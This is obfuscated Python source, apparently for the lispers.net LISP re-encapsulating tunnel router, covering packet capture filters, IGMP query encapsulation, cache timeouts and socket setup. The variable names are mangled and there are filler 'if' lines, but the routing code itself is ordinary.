o0ooO0OOO = 4 if I1Iii1I == "lo0" else ( 14 if lisp . lisp_is_macos ( ) else 16 )
packet = packet [ o0ooO0OOO : : ]
if 74 - 74: Ii1I * i11iIiiIii / I1Ii111
if 75 - 75: O0 - OoooooooOO + ooOoO0o . oO0o % II111iiii
if 9 - 9: II111iiii * II111iiii . i11iIiiIii * iIii1I11I1II1
if 18 - 18: OoO0O00 . II111iiii % OoOoOO00 % Ii1I
if ( O0Oo ) :
oo0 = iIi11I . input_stats . packet_count % O0Oo
oo0 = oo0 + ( len ( I11 ) - O0Oo )
i1iIIi1II1iiI = I11 [ oo0 ]
i1iIIi1II1iiI . input_queue . put ( packet )
else :
iIi11I . lisp_packet . packet = packet
IIIii ( iIi11I . lisp_packet , iIi11I . thread_name )
if 31 - 31: o0oOOo0O0Ooo % I11i + iIii1I11I1II1 + i11iIiiIii * I1Ii111
return
if 45 - 45: OOooOOo * I1Ii111 . ooOoO0o - I1Ii111 + IiII
if 34 - 34: OOooOOo . Oo0Ooo
if 78 - 78: I1ii11iIi11i % I1IiiI / OoooooooOO % OOooOOo - iII111i
if 2 - 2: iIii1I11I1II1
if 45 - 45: OoooooooOO / i11iIiiIii
if 10 - 10: iII111i - oO0o * iIii1I11I1II1 % iIii1I11I1II1 * IiII - I1ii11iIi11i
if 97 - 97: II111iiii % I1Ii111 + I1Ii111 - OoO0O00 / Ii1I * I1IiiI
if 17 - 17: Ii1I
def i1i1IiIi1 ( lisp_thread ) :
lisp . lisp_set_exception ( )
if ( lisp . lisp_myrlocs [ 0 ] == None ) : return
if 22 - 22: I11i * O0 . II111iiii - OoO0O00
I1Iii1I = "lo0" if lisp . lisp_is_macos ( ) else "any"
o0Oo00OO0 = pcappy . open_live ( I1Iii1I , 9000 , 0 , 100 )
if 50 - 50: Ii1I * o0oOOo0O0Ooo % i11iIiiIii
if 96 - 96: I1ii11iIi11i + Oo0Ooo * OoO0O00 % ooOoO0o - O0
if 54 - 54: OoOoOO00 . oO0o % i11iIiiIii / OoooooooOO + IiII % oO0o
if 36 - 36: oO0o
if 74 - 74: OoooooooOO
OoOoO0O = commands . getoutput ( "egrep 'lisp-nat = yes' ./lisp.config" )
OoOoO0O = ( OoOoO0O != "" and OoOoO0O [ 0 ] == " " )
if 100 - 100: O0
o00IiI1iiII1i1i = "(dst host "
i1IiI = ""
for oO00OOoO00 in lisp . lisp_get_all_addresses ( ) :
o00IiI1iiII1i1i += "{} or " . format ( oO00OOoO00 )
i1IiI += "{} or " . format ( oO00OOoO00 )
if 82 - 82: OoOoOO00
o00IiI1iiII1i1i = o00IiI1iiII1i1i [ 0 : - 4 ]
o00IiI1iiII1i1i += ") and ((udp dst port 4341 or 8472 or 4789) or "
o00IiI1iiII1i1i += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + "(ip[6]&0xe0 == 0 and ip[7] != 0))))"
if 80 - 80: OoO0O00 % iII111i
if 99 - 99: ooOoO0o / iIii1I11I1II1 - Ii1I * I1ii11iIi11i % I1IiiI
if 13 - 13: OoO0O00
if 70 - 70: I1Ii111 + O0 . oO0o * Ii1I
if 2 - 2: OoooooooOO . OOooOOo . IiII
if 42 - 42: OOooOOo % oO0o / OoO0O00 - oO0o * i11iIiiIii
i1IiI = i1IiI [ 0 : - 4 ]
o00IiI1iiII1i1i += ( " or (not (src host {}) and " + "((udp src port 4342 and ip[28] == 0x28) or " + "(udp dst port 4342 and ip[28] == 0x12)))" ) . format ( i1IiI )
if 19 - 19: oO0o * I1IiiI % i11iIiiIii
if 24 - 24: o0oOOo0O0Ooo
if 10 - 10: o0oOOo0O0Ooo % Ii1I / OOooOOo
if ( OoOoO0O ) :
o00IiI1iiII1i1i += ( " or (dst net 0.0.0.0/0 and " + "not (host {} or src net 127.0.0.0/8))" ) . format ( i1IiI )
if 28 - 28: OOooOOo % ooOoO0o
if 48 - 48: i11iIiiIii % oO0o
if 29 - 29: iII111i + i11iIiiIii % I11i
lisp . lprint ( "Capturing packets for: '{}'" . format ( o00IiI1iiII1i1i ) )
o0Oo00OO0 . filter = o00IiI1iiII1i1i
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
o0Oo00OO0 . loop ( - 1 , Oo , [ I1Iii1I , lisp_thread ] )
return
if 21 - 21: OOooOOo
if 6 - 6: IiII
if 46 - 46: IiII + oO0o
if 79 - 79: OoooooooOO - IiII * IiII . OoOoOO00
if 100 - 100: II111iiii * I11i % I1IiiI / I1ii11iIi11i
if 90 - 90: I1ii11iIi11i . ooOoO0o . OoOoOO00 . Ii1I
if 4 - 4: Ii1I + OoOoOO00 % I1ii11iIi11i / i11iIiiIii
if 74 - 74: II111iiii . O0 - I1IiiI + IiII % i11iIiiIii % OoOoOO00
def O0OOO0 ( lisp_raw_socket , eid , geid , igmp ) :
if 8 - 8: i11iIiiIii / II111iiii + o0oOOo0O0Ooo * Ii1I % IiII . I11i
if 6 - 6: IiII % Oo0Ooo . Oo0Ooo - I1ii11iIi11i / I11i . i1IIi
if 99 - 99: OoOoOO00 . I1Ii111
if 59 - 59: I11i / Oo0Ooo / OOooOOo / O0 / OoOoOO00 + o0oOOo0O0Ooo
Ooooo00o0OoO = lisp . lisp_packet ( igmp )
if 13 - 13: o0oOOo0O0Ooo % oO0o / I1Ii111 % I1Ii111 % O0
if 90 - 90: IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
O00o0OO0000oo = lisp . lisp_map_cache_lookup ( eid , geid )
if ( O00o0OO0000oo == None ) : return
if ( O00o0OO0000oo . rloc_set == [ ] ) : return
if ( O00o0OO0000oo . rloc_set [ 0 ] . rle == None ) : return
if 35 - 35: I1ii11iIi11i / iII111i % I1IiiI + iIii1I11I1II1
oO00o = eid . print_address_no_iid ( )
for oO0oOo0 in O00o0OO0000oo . rloc_set [ 0 ] . rle . rle_nodes :
if ( oO0oOo0 . rloc_name == oO00o ) :
Ooooo00o0OoO . outer_dest . copy_address ( oO0oOo0 . address )
Ooooo00o0OoO . encap_port = oO0oOo0 . translated_port
break
if 36 - 36: I1Ii111 . II111iiii % ooOoO0o
if 84 - 84: OoooooooOO - i11iIiiIii / iIii1I11I1II1 / OoooooooOO / I1ii11iIi11i
if ( Ooooo00o0OoO . outer_dest . is_null ( ) ) : return
if 4 - 4: Oo0Ooo + o0oOOo0O0Ooo
Ooooo00o0OoO . outer_source . copy_address ( lisp . lisp_myrlocs [ 0 ] )
Ooooo00o0OoO . outer_version = Ooooo00o0OoO . outer_dest . afi_to_version ( )
Ooooo00o0OoO . outer_ttl = 32
Ooooo00o0OoO . inner_source . copy_address ( lisp . lisp_myrlocs [ 0 ] )
Ooooo00o0OoO . inner_dest . store_address ( "[{}]224.0.0.1" . format ( geid . instance_id ) )
Ooooo00o0OoO . inner_ttl = 1
if 17 - 17: OoO0O00 * OoOoOO00
iiI111I1iIiI = lisp . green ( eid . print_address ( ) , False )
ooOoOOOOo = lisp . red ( "{}:{}" . format ( Ooooo00o0OoO . outer_dest . print_address_no_iid ( ) ,
Ooooo00o0OoO . encap_port ) , False )
ii11i = lisp . bold ( "IGMP Query" , False )
if 71 - 71: I1Ii111 / I1ii11iIi11i * iIii1I11I1II1
lisp . lprint ( "Data encapsulate {} to gleaned EID {}, RLOC {}" . format ( ii11i , iiI111I1iIiI , ooOoOOOOo ) )
if 57 - 57: OOooOOo + I1Ii111 % I1ii11iIi11i . OoO0O00 / OoO0O00 * O0
if 6 - 6: i1IIi - II111iiii * o0oOOo0O0Ooo . OoO0O00
if 68 - 68: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 - I1Ii111
if 37 - 37: IiII
if ( Ooooo00o0OoO . encode ( None ) == None ) : return
Ooooo00o0OoO . print_packet ( "Send" , True )
if 37 - 37: Oo0Ooo / IiII * O0
Ooooo00o0OoO . send_packet ( lisp_raw_socket , Ooooo00o0OoO . outer_dest )
if 73 - 73: iII111i * iII111i / ooOoO0o
if 43 - 43: I1ii11iIi11i . i1IIi . IiII + O0 * Ii1I * O0
if 41 - 41: I1ii11iIi11i + Ii1I % OoooooooOO . I1ii11iIi11i + iII111i . iII111i
if 31 - 31: i11iIiiIii + II111iiii . iII111i * OoOoOO00
if 66 - 66: OoOoOO00 + i1IIi % II111iiii . O0 * I1ii11iIi11i % I1ii11iIi11i
if 87 - 87: OOooOOo + o0oOOo0O0Ooo . iII111i - OoooooooOO
if 6 - 6: iIii1I11I1II1 * OoooooooOO
if 28 - 28: Oo0Ooo * o0oOOo0O0Ooo / I1Ii111
if 52 - 52: O0 / o0oOOo0O0Ooo % iII111i * I1IiiI % OOooOOo
if 69 - 69: I1ii11iIi11i
if 83 - 83: o0oOOo0O0Ooo
if 38 - 38: I1Ii111 + OoooooooOO . i1IIi
if 19 - 19: iII111i - o0oOOo0O0Ooo - Ii1I - OoOoOO00 . iII111i . I1Ii111
if 48 - 48: iII111i + IiII
if 60 - 60: I11i + iII111i . IiII / i1IIi . iIii1I11I1II1
if 14 - 14: OOooOOo
if 79 - 79: Ii1I
if 76 - 76: iIii1I11I1II1
if 80 - 80: iIii1I11I1II1 . O0 / Ii1I % Ii1I
if 93 - 93: OoooooooOO * Oo0Ooo
if 10 - 10: I1Ii111 * OoooooooOO + I11i - I1ii11iIi11i / I1ii11iIi11i . i11iIiiIii
if 22 - 22: I1Ii111 / o0oOOo0O0Ooo
if 98 - 98: i1IIi
if 51 - 51: I1ii11iIi11i + ooOoO0o + Oo0Ooo / i1IIi + i1IIi
if 12 - 12: iIii1I11I1II1 . Ii1I . I1ii11iIi11i % I1IiiI . II111iiii . oO0o
def IIi1ii1 ( lisp_raw_socket ) :
if ( lisp . lisp_gleaned_groups == { } ) : return
if 48 - 48: ooOoO0o / iIii1I11I1II1 + OOooOOo + iIii1I11I1II1 . OoO0O00
if 60 - 60: I1Ii111
if 98 - 98: ooOoO0o
if 34 - 34: iIii1I11I1II1 * I11i * I11i / I1ii11iIi11i
if 28 - 28: OoO0O00 - oO0o + OoOoOO00 + Ii1I / iIii1I11I1II1
iiiii11I1 = "\x46\xc0\x00\x24\x00\x00\x40\x00\x01\x02\x00\x00"
Ii1 = lisp . lisp_myrlocs [ 0 ]
iII1 = Ii1 . address
iiiii11I1 += chr ( ( iII1 >> 24 ) & 0xff )
iiiii11I1 += chr ( ( iII1 >> 16 ) & 0xff )
iiiii11I1 += chr ( ( iII1 >> 8 ) & 0xff )
iiiii11I1 += chr ( iII1 & 0xff )
iiiii11I1 += "\xe0\x00\x00\x01"
iiiii11I1 += "\x94\x04\x00\x00"
iiiii11I1 = lisp . lisp_ip_checksum ( iiiii11I1 , 24 )
if 77 - 77: OOooOOo / II111iiii + IiII + ooOoO0o - i11iIiiIii
if 44 - 44: I1IiiI + OoOoOO00 + I1ii11iIi11i . I1IiiI * OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
I1i11II = "\x11\x64\x00\x00" + "\x00\x00\x00\x00" + "\x02\x3c\x00\x00"
I1i11II = lisp . lisp_igmp_checksum ( I1i11II )
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
o0oOO000oO0oo = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
i1 = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
for Ii1iIiII1ii1 in lisp . lisp_gleaned_groups :
o0oOO000oO0oo . store_address ( Ii1iIiII1ii1 )
for iI1ii11Ii in lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] :
i1 . store_address ( iI1ii11Ii )
i1I11IiI1iiII , o00oOo0oOoo , O0OO0OO = lisp . lisp_allow_gleaning ( o0oOO000oO0oo , i1 , None )
if ( O0OO0OO == False ) : continue
O0OOO0 ( lisp_raw_socket , o0oOO000oO0oo , i1 , iiiii11I1 + I1i11II )
if 63 - 63: iIii1I11I1II1 + OOooOOo . OoO0O00 / I1IiiI
if 84 - 84: i1IIi
if 42 - 42: II111iiii - OoO0O00 - OoooooooOO . iII111i / OoOoOO00
if 56 - 56: i11iIiiIii - iIii1I11I1II1 . II111iiii
if 81 - 81: IiII / OoOoOO00 * IiII . O0
if 61 - 61: OoO0O00 * OOooOOo + I1Ii111 . iIii1I11I1II1 % I11i . I1Ii111
if 53 - 53: I1Ii111 * IiII / iIii1I11I1II1 / I1IiiI % I1ii11iIi11i
if 39 - 39: OoO0O00 / OoooooooOO . OoO0O00 * I1ii11iIi11i / OoOoOO00
if 38 - 38: OoO0O00 / ooOoO0o % I1Ii111 * I11i + i11iIiiIii % ooOoO0o
if 61 - 61: I1Ii111 - Ii1I % I1ii11iIi11i / ooOoO0o / iII111i + iIii1I11I1II1
def O0O0oo ( ) :
o0oOO000oO0oo = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
i1 = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 83 - 83: IiII / I1Ii111
OOo000OO000 = [ ]
for Ii1iIiII1ii1 in lisp . lisp_gleaned_groups :
for iI1ii11Ii in lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] :
OOOO00OooO = lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] [ iI1ii11Ii ]
OOO = time . time ( ) - OOOO00OooO
if ( OOO < lisp . LISP_IGMP_TIMEOUT_INTERVAL ) : continue
OOo000OO000 . append ( [ Ii1iIiII1ii1 , iI1ii11Ii ] )
if 32 - 32: OoooooooOO
if 52 - 52: Ii1I % OOooOOo * I1IiiI % I11i + OOooOOo / iII111i
if 80 - 80: OoooooooOO + IiII
if 95 - 95: I1Ii111 / oO0o * I1Ii111 - OoooooooOO * OoooooooOO % OoO0O00
if 43 - 43: Oo0Ooo . I1Ii111
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
if 29 - 29: IiII . ooOoO0o - II111iiii
ooooO0 = lisp . bold ( "timed out" , False )
for Ii1iIiII1ii1 , iI1ii11Ii in OOo000OO000 :
o0oOO000oO0oo . store_address ( Ii1iIiII1ii1 )
i1 . store_address ( iI1ii11Ii )
iiI111I1iIiI = lisp . green ( Ii1iIiII1ii1 , False )
Iiii111 = lisp . green ( iI1ii11Ii , False )
lisp . lprint ( "{} RLE {} for gleaned group {}" . format ( iiI111I1iIiI , ooooO0 , Iiii111 ) )
lisp . lisp_remove_gleaned_multicast ( o0oOO000oO0oo , i1 )
if 71 - 71: O0 / I1IiiI . I1Ii111 / I1Ii111 * ooOoO0o
if 60 - 60: II111iiii . I1IiiI - Oo0Ooo + I1ii11iIi11i * I1ii11iIi11i
if 27 - 27: IiII * I1IiiI . iIii1I11I1II1 - iIii1I11I1II1
if 5 - 5: IiII
if 84 - 84: II111iiii * oO0o * II111iiii % IiII / I1IiiI
if 100 - 100: IiII . Ii1I - iIii1I11I1II1 . i11iIiiIii / II111iiii
if 71 - 71: I1Ii111 * Oo0Ooo . I11i
if 49 - 49: IiII * O0 . IiII
def ii1II1II ( lisp_raw_socket ) :
lisp . lisp_set_exception ( )
if 42 - 42: Ii1I
if 68 - 68: OOooOOo . Oo0Ooo % ooOoO0o - OoooooooOO * iII111i . OOooOOo
if 46 - 46: i11iIiiIii - OOooOOo * I1IiiI * I11i % I1ii11iIi11i * i1IIi
if 5 - 5: O0 / ooOoO0o . Oo0Ooo + OoooooooOO
for oOo0oO in lisp . lisp_crypto_keys_by_nonce . values ( ) :
for O0o in oOo0oO : del ( O0o )
if 78 - 78: OOooOOo % iIii1I11I1II1
lisp . lisp_crypto_keys_by_nonce . clear ( )
lisp . lisp_crypto_keys_by_nonce = { }
if 50 - 50: I1IiiI % iIii1I11I1II1 % OOooOOo
if 84 - 84: IiII + I1ii11iIi11i + Ii1I + iII111i
if 62 - 62: i11iIiiIii + OoOoOO00 + i1IIi
if 69 - 69: OoOoOO00
lisp . lisp_timeout_map_cache ( lisp . lisp_map_cache )
if 63 - 63: OoO0O00 / OoOoOO00 * iIii1I11I1II1 . I1Ii111
if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
lisp . lisp_rtr_nat_trace_cache . clear ( )
lisp . lisp_rtr_nat_trace_cache = { }
if 88 - 88: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
O0O0oo ( )
if 3 - 3: OoooooooOO
if 71 - 71: IiII + i1IIi - iII111i - i11iIiiIii . I11i - ooOoO0o
if 85 - 85: I1ii11iIi11i - OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
IIi1ii1 ( lisp_raw_socket )
if 35 - 35: II111iiii . I1IiiI / i1IIi / I1IiiI * oO0o
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
if 80 - 80: oO0o * I11i / iIii1I11I1II1 % oO0o / iIii1I11I1II1
if 42 - 42: i1IIi / i11iIiiIii . Oo0Ooo * iII111i . i11iIiiIii * O0
Oooo0000 = threading . Timer ( 60 , ii1II1II ,
[ lisp_raw_socket ] )
Oooo0000 . start ( )
return
if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
if 27 - 27: OOooOOo
if 52 - 52: I1Ii111 % OoOoOO00 + iIii1I11I1II1 * oO0o . Ii1I
if 95 - 95: iIii1I11I1II1 . IiII - OoooooooOO * OoO0O00 / o0oOOo0O0Ooo
if 74 - 74: oO0o
if 34 - 34: iII111i
if 44 - 44: i1IIi % I1IiiI % o0oOOo0O0Ooo
def iIIi1Ii1III ( ) :
global Oo0oO0oo0oO00 , II1iII1i , II1Ii1iI1i
global OOo , Ii1IIii11 , I11
global i111I , oO0oIIII
global iIiiI1
if 86 - 86: i11iIiiIii + i11iIiiIii . I1Ii111 % I1IiiI . ooOoO0o
lisp . lisp_i_am ( "rtr" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "RTR starting up" )
if 17 - 17: Ii1I
if 67 - 67: O0 * I11i - o0oOOo0O0Ooo - II111iiii
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if 45 - 45: Ii1I - OOooOOo
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
if 10 - 10: Ii1I - i11iIiiIii . I1ii11iIi11i % i1IIi
if 78 - 78: iIii1I11I1II1 * Oo0Ooo . Oo0Ooo - OOooOOo . iIii1I11I1II1
if 30 - 30: ooOoO0o + ooOoO0o % IiII - o0oOOo0O0Ooo - I1ii11iIi11i
if 36 - 36: I11i % OOooOOo
iIiiI1 = lisp . lisp_myrlocs [ 0 ]
if ( lisp . lisp_on_aws ( ) ) :
iIiiI1 = lisp . lisp_get_interface_address ( "eth0" )
if 72 - 72: I1IiiI / iII111i - O0 + I11i
if 83 - 83: O0
if 89 - 89: Oo0Ooo + I1ii11iIi11i - o0oOOo0O0Ooo
if 40 - 40: OoO0O00 + OoO0O00
if 94 - 94: iII111i * iIii1I11I1II1 . I11i
if 13 - 13: iIii1I11I1II1 * OoOoOO00 / I1Ii111 % ooOoO0o + oO0o
if 41 - 41: I1ii11iIi11i
i1iI1i = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
II1Ii1iI1i = lisp . lisp_open_listen_socket ( i1iI1i ,
str ( iiI1iIiI ) )
Oo0oO0oo0oO00 = lisp . lisp_open_listen_socket ( "" , "lisp-rtr" )
i111I = lisp . lisp_open_listen_socket ( "" , "lispers.net-itr" )
if 59 - 59: IiII
II1iII1i [ 0 ] = II1Ii1iI1i
if 89 - 89: OoOoOO00 % iIii1I11I1II1
II1iII1i [ 1 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV6 )
II1iII1i [ 2 ] = Oo0oO0oo0oO00
if 35 - 35: I1ii11iIi11i + I1Ii111 - OoOoOO00 % oO0o % o0oOOo0O0Ooo % OoOoOO00
if 45 - 45: I1IiiI * OOooOOo % OoO0O00
if 24 - 24: ooOoO0o - I11i * oO0o
if 87 - 87: Ii1I - I1ii11iIi11i % I1ii11iIi11i . oO0o / I1ii11iIi11i
if 6 - 6: OoOoOO00 / iIii1I11I1II1 * OoooooooOO * i11iIiiIii
if 79 - 79: IiII % OoO0O00
if 81 - 81: i11iIiiIii + i11iIiiIii * OoO0O00 + IiII
if 32 - 32: O0 . OoooooooOO
if 15 - 15: I1IiiI . OoO0O00
OOo = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_RAW )
OOo . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
II1iII1i . append ( OOo )
if 17 - 17: i11iIiiIii / Oo0Ooo . OoO0O00 / I1IiiI
if 38 - 38: i1IIi . I1ii11iIi11i % Ii1I + iIii1I11I1II1 + O0
if 47 - 47: OoO0O00 + IiII / II111iiii
if 97 - 97: I1ii11iIi11i / I1IiiI % O0 + i1IIi - ooOoO0o
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
oO0oIIII = lisp . lisp_open_listen_socket ( "0.0.0.0" ,
str ( lisp . LISP_TRACE_PORT ) )
if 94 - 94: iII111i - Oo0Ooo + oO0o
if ( lisp . lisp_is_raspbian ( ) == False ) :
Ii1IIii11 = socket . socket ( socket . AF_INET6 , socket . SOCK_RAW ,
socket . IPPROTO_UDP )
if 59 - 59: I11i . I1IiiI - iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: oO0o + ooOoO0o
Ii1Ii1 = os . getenv ( "LISP_PCAP_THREADS" )
Ii1Ii1 = 1 if ( Ii1Ii1 == None ) else int ( Ii1Ii1 )
ii1IiI11I = os . getenv ( "LISP_WORKER_THREADS" )
ii1IiI11I = 0 if ( ii1IiI11I == None ) else int ( ii1IiI11I )
if 90 - 90: o0oOOo0O0Ooo % oO0o % i11iIiiIii . OOooOOo % OOooOOo
if 36 - 36: Oo0Ooo % Ii1I / i11iIiiIii % I1Ii111 + OoO0O00
if 23 - 23: II111iiii
if 93 - 93: oO0o . I11i / i1IIi
for i11ii in range ( Ii1Ii1 ) :
oOOOOO0Ooooo = lisp . lisp_thread ( "pcap-{}" . format ( i11ii ) )
oOOOOO0Ooooo . thread_number = i11ii
oOOOOO0Ooooo . number_of_pcap_threads = Ii1Ii1
oOOOOO0Ooooo . number_of_worker_threads = ii1IiI11I
I11 . append ( oOOOOO0Ooooo )
threading . Thread ( target = i1i1IiIi1 , args = [ oOOOOO0Ooooo ] ) . start ( )
if 57 - 57: Ii1I - OoooooooOO
if 68 - 68: o0oOOo0O0Ooo % I1ii11iIi11i / I1Ii111 + I1Ii111 - I1Ii111 . OoO0O00
if 100 - 100: OoOoOO00 % Oo0Ooo
if 76 - 76: II111iiii / OoO0O00 + OoooooooOO . I1ii11iIi11i . I11i . ooOoO0o
if 43 - 43: i1IIi
if 17 - 17: O0 - OoOoOO00
for i11ii in range ( ii1IiI11I ) :
oOOOOO0Ooooo = lisp . lisp_thread ( "worker-{}" . format ( i11ii ) )
I11 . append ( oOOOOO0Ooooo )
threading . Thread ( target = I1I1iII1i , args = [ oOOOOO0Ooooo ] ) . start ( )
if 81 - 81: I1IiiI - iIii1I11I1II1 / I1IiiI / O0
if 34 - 34: Ii1I * Ii1I - I1ii11iIi11i - O0 . i11iIiiIii
if 32 - 32: iIii1I11I1II1 . OoO0O00 * oO0o / OOooOOo . II111iiii - Oo0Ooo
if 10 - 10: I1ii11iIi11i / i11iIiiIii - Ii1I + oO0o * I1IiiI
if 94 - 94: I1IiiI + iIii1I11I1II1 / O0 - OoooooooOO % I1ii11iIi11i
lisp . lisp_load_checkpoint ( )
if 64 - 64: I11i + OoO0O00
if 25 - 25: I1IiiI . ooOoO0o + I1IiiI % Ii1I * iIii1I11I1II1
if 31 - 31: i11iIiiIii + OOooOOo - O0
if 51 - 51: OoO0O00 * i1IIi / Ii1I * OOooOOo + ooOoO0o % I1ii11iIi11i
lisp . lisp_load_split_pings = ( os . getenv ( "LISP_LOAD_SPLIT_PINGS" ) != None )
if 34 - 34: oO0o * OoooooooOO + Ii1I + i11iIiiIii
if 22 - 22: i1IIi
if 24 - 24: I11i / I1IiiI * i1IIi % OoooooooOO
if 99 - 99: i11iIiiIii . II111iiii . OoooooooOO
Oooo0000 = threading . Timer ( 60 , ii1II1II ,
[ OOo ] )
Oooo0000 . start ( )
return ( True )
if 59 - 59: i11iIiiIii . OoooooooOO / I11i * I1ii11iIi11i + OoooooooOO
if 3 - 3: i11iIiiIii * Oo0Ooo % iIii1I11I1II1 % I1IiiI * iII111i / OOooOOo
if 95 - 95: IiII * O0 * I1Ii111 . OoooooooOO % Oo0Ooo + I1ii11iIi11i
if 98 - 98: oO0o . OoooooooOO
if 54 - 54: O0 / IiII % ooOoO0o * i1IIi * O0
if 48 - 48: o0oOOo0O0Ooo . oO0o % OoOoOO00 - OoOoOO00
if 33 - 33: I11i % II111iiii + OoO0O00
def OoIi1I1I ( ) :
if 56 - 56: O0
if 45 - 45: OoOoOO00 - OoO0O00 - OoOoOO00
if 41 - 41: Oo0Ooo / i1IIi / Oo0Ooo - iII111i . o0oOOo0O0Ooo
if 65 - 65: O0 * i11iIiiIii . OoooooooOO / I1IiiI / iII111i
lisp . lisp_close_socket ( II1iII1i [ 0 ] , "" )
lisp . lisp_close_socket ( II1iII1i [ 1 ] , "" )
lisp . lisp_close_socket ( Oo0oO0oo0oO00 , "lisp-rtr" )
lisp . lisp_close_socket ( II1Ii1iI1i , "" )
lisp . lisp_close_socket ( oO0oIIII , "" )
lisp . lisp_close_socket ( i111I , "lispers.net-itr" )
OOo . close ( )
return
if 69 - 69: ooOoO0o % ooOoO0o
if 76 - 76: i11iIiiIii * iII111i / OoO0O00 % I1ii11iIi11i + OOooOOo
if 48 - 48: iIii1I11I1II1 % i1IIi + OoOoOO00 % o0oOOo0O0Ooo
if 79 - 79: OoOoOO00 % I1IiiI % Ii1I / i1IIi % OoO0O00
if 56 - 56: iIii1I11I1II1 - i11iIiiIii * iII111i
if 84 - 84: OOooOOo + Ii1I + o0oOOo0O0Ooo
if 33 - 33: Ii1I
def ooOOO00oOOooO ( kv_pair ) :
global II1iII1i
global iiI1iIiI
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
lispconfig . lisp_map_resolver_command ( kv_pair )
if 66 - 66: O0
if ( lisp . lisp_test_mr_timer == None or
lisp . lisp_test_mr_timer . is_alive ( ) == False ) :
lisp . lisp_test_mr_timer = threading . Timer ( 2 , lisp . lisp_test_mr ,
[ II1iII1i , iiI1iIiI ] )
lisp . lisp_test_mr_timer . start ( )
if 52 - 52: OoO0O00 * OoooooooOO
return
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
if 71 - 71: I1Ii111 - o0oOOo0O0Ooo - OOooOOo
if 28 - 28: iIii1I11I1II1
if 7 - 7: o0oOOo0O0Ooo % IiII * OoOoOO00
if 58 - 58: IiII / I11i + II111iiii % iII111i - OoooooooOO
if 25 - 25: OoOoOO00 % OoooooooOO * Oo0Ooo - i1IIi * II111iiii * oO0o
if 30 - 30: I11i % OoOoOO00 / I1ii11iIi11i * O0 * Ii1I . I1IiiI
if 46 - 46: OoOoOO00 - O0
def O00Ooo ( kv_pair ) :
global II1Ii1iI1i , OOo , iiI1iIiI
if 92 - 92: OoOoOO00 % O0
oo00ooooOOo00 = lisp . lisp_rloc_probing
if 16 - 16: i11iIiiIii / i1IIi % OOooOOo
if 84 - 84: I11i - Oo0Ooo * O0 / Ii1I . Ii1I
if 93 - 93: O0 / ooOoO0o + I1IiiI
if 20 - 20: IiII / iII111i % OoooooooOO / iIii1I11I1II1 + I1IiiI
lispconfig . lisp_xtr_command ( kv_pair )
if 57 - 57: o0oOOo0O0Ooo / I1Ii111
if 13 - 13: OoooooooOO + OoO0O00
if 32 - 32: O0 + oO0o % Oo0Ooo
if 7 - 7: I1ii11iIi11i / ooOoO0o
if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
if ( oo00ooooOOo00 == False and lisp . lisp_rloc_probing ) :
i1I = [ II1Ii1iI1i , II1Ii1iI1i ,
None , OOo ]
lisp . lisp_start_rloc_probe_timer ( 1 , i1I )
oO0Oo = { "type" : "itr-crypto-port" , "port" : iiI1iIiI }
lisp . lisp_write_to_dp_socket ( oO0Oo )
